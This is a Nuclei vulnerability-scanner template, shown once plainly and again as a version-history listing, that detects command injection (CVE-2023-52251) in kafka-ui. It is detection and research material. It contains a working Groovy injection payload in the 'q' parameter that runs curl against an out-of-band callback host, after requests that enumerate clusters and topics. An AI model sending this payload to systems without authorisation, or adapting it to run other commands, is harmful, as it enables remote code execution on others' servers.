nuclei-templates/http/cves/2023/CVE-2023-52251.yaml

id: CVE-2023-52251

info:
  name: Kafka UI 0.7.1 Command Injection
  author: yhy0,iamnoooob
  severity: high
  description: |
    An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages.
  reference:
    - http://packetstormsecurity.com/files/177214/Kafka-UI-0.7.1-Command-Injection.html
    - https://github.com/BobTheShoplifter/CVE-2023-52251-POC
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-52251
    cwe-id: CWE-94
    epss-score: 0.03218
    epss-percentile: 0.91206
    cpe: cpe:2.3:a:provectus:ui:*:*:*:*:*:kafka:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: provectus
    product: ui
    framework: kafka
    fofa-query: icon_hash="-1477045616"
  tags: cve,cve2023,rce,kafka,kafka-ui,packetstorm

http:
  - raw:
      - |
        GET /api/clusters HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: json
        name: cluster-name
        internal: true
        json:
          - '.[0].name'

  - raw:
      - |
        GET /api/clusters/{{cluster-name}}/topics?page=1&perPage=25&showInternal=true HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: json
        name: topic-name
        internal: true
        json:
          - '.topics[].name'

  - raw:
      - |
        @timeout 20s
        GET /api/clusters/{{cluster-name}}/topics/{{topic-name}}/messages?q=new+ProcessBuilder%28%22curl%22%2C%22{{interactsh-url}}%22%29.start%28%29&filterQueryType=GROOVY_SCRIPT&attempt=7&limit=100&page=0&seekDirection=FORWARD&keySerde=String&valueSerde=String&seekType=BEGINNING HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: body
        words:
          - 'Assigning partitions'
# digest: 4b0a0048304602210090dcbdf999787073e347b90236896f106cca2b7ba465b80d3e338f35b1e50d8802210088f1ccf1eab30ea3f481aec5b0721a90153b605601fe3212d5ac1c7406f9f858:922c64590222798bb761d5b6d8e72950
add CVE-2023-52251 2024-03-14 08:49:09 +00:00			`id: CVE-2023-52251`

			`info:`
Update CVE-2023-52251.yaml 2024-03-14 10:18:27 +00:00			`name: Kafka UI 0.7.1 Command Injection`
minor update 2024-06-25 13:19:49 +00:00			`author: yhy0,iamnoooob`
Update CVE-2023-52251.yaml 2024-03-14 10:18:27 +00:00			`severity: high`
add CVE-2023-52251 2024-03-14 08:49:09 +00:00			`description: \|`
Update CVE-2023-52251.yaml 2024-03-14 10:18:27 +00:00			`An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages.`
add CVE-2023-52251 2024-03-14 08:49:09 +00:00			`reference:`
Update CVE-2023-52251.yaml 2024-03-14 10:18:27 +00:00			`- http://packetstormsecurity.com/files/177214/Kafka-UI-0.7.1-Command-Injection.html`
minor update 2024-06-25 13:19:49 +00:00			`- https://github.com/BobTheShoplifter/CVE-2023-52251-POC`
Update CVE-2023-52251.yaml 2024-03-14 10:18:27 +00:00			`- https://github.com/nomi-sec/PoC-in-GitHub`
add CVE-2023-52251 2024-03-14 08:49:09 +00:00			`classification:`
Update CVE-2023-52251.yaml 2024-03-14 10:18:27 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`
add CVE-2023-52251 2024-03-14 08:49:09 +00:00			`cvss-score: 8.8`
			`cve-id: CVE-2023-52251`
Update CVE-2023-52251.yaml 2024-03-14 10:18:27 +00:00			`cwe-id: CWE-94`
minor update 2024-06-25 13:19:49 +00:00			`epss-score: 0.03218`
			`epss-percentile: 0.91206`
Update CVE-2023-52251.yaml 2024-03-14 10:18:27 +00:00			`cpe: cpe:2.3:a:provectus:ui::::::kafka::*`
add CVE-2023-52251 2024-03-14 08:49:09 +00:00			`metadata:`
Update CVE-2023-52251.yaml 2024-03-14 10:18:27 +00:00			`verified: true`
add CVE-2023-52251 2024-03-14 08:49:09 +00:00			`max-request: 3`
Update CVE-2023-52251.yaml 2024-03-14 10:18:27 +00:00			`vendor: provectus`
			`product: ui`
			`framework: kafka`
add CVE-2023-52251 2024-03-14 08:49:09 +00:00			`fofa-query: icon_hash="-1477045616"`
minor update 2024-06-25 13:19:49 +00:00			`tags: cve,cve2023,rce,kafka,kafka-ui,packetstorm`
add CVE-2023-52251 2024-03-14 08:49:09 +00:00
			`http:`
minor update 2024-06-25 13:19:49 +00:00			`- raw:`
			`- \|`
			`GET /api/clusters HTTP/1.1`
			`Host: {{Hostname}}`
Update CVE-2023-52251.yaml 2024-03-14 10:18:27 +00:00
add CVE-2023-52251 2024-03-14 08:49:09 +00:00			`extractors:`
			`- type: json`
minor update 2024-06-25 13:19:49 +00:00			`name: cluster-name`
add CVE-2023-52251 2024-03-14 08:49:09 +00:00			`internal: true`
minor update 2024-06-25 13:19:49 +00:00			`json:`
			`- '.[0].name'`

			`- raw:`
			`- \|`
			`GET /api/clusters/{{cluster-name}}/topics?page=1&perPage=25&showInternal=true HTTP/1.1`
			`Host: {{Hostname}}`
add CVE-2023-52251 2024-03-14 08:49:09 +00:00
minor update 2024-06-25 13:19:49 +00:00			`extractors:`
add CVE-2023-52251 2024-03-14 08:49:09 +00:00			`- type: json`
minor update 2024-06-25 13:19:49 +00:00			`name: topic-name`
add CVE-2023-52251 2024-03-14 08:49:09 +00:00			`internal: true`
minor update 2024-06-25 13:19:49 +00:00			`json:`
			`- '.topics[].name'`

			`- raw:`
			`- \|`
			`@timeout 20s`
			`GET /api/clusters/{{cluster-name}}/topics/{{topic-name}}/messages?q=new+ProcessBuilder%28%22curl%22%2C%22{{interactsh-url}}%22%29.start%28%29&filterQueryType=GROOVY_SCRIPT&attempt=7&limit=100&page=0&seekDirection=FORWARD&keySerde=String&valueSerde=String&seekType=BEGINNING HTTP/1.1`
			`Host: {{Hostname}}`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: interactsh_protocol`
			`words:`
			`- "http"`

			`- type: word`
			`part: body`
			`words:`
			`- 'Assigning partitions'`
Auto Template Signing [Thu Jun 27 09:57:32 UTC 2024] :robot: 2024-06-27 09:57:32 +00:00			`# digest: 4b0a0048304602210090dcbdf999787073e347b90236896f106cca2b7ba465b80d3e338f35b1e50d8802210088f1ccf1eab30ea3f481aec5b0721a90153b605601fe3212d5ac1c7406f9f858:922c64590222798bb761d5b6d8e72950`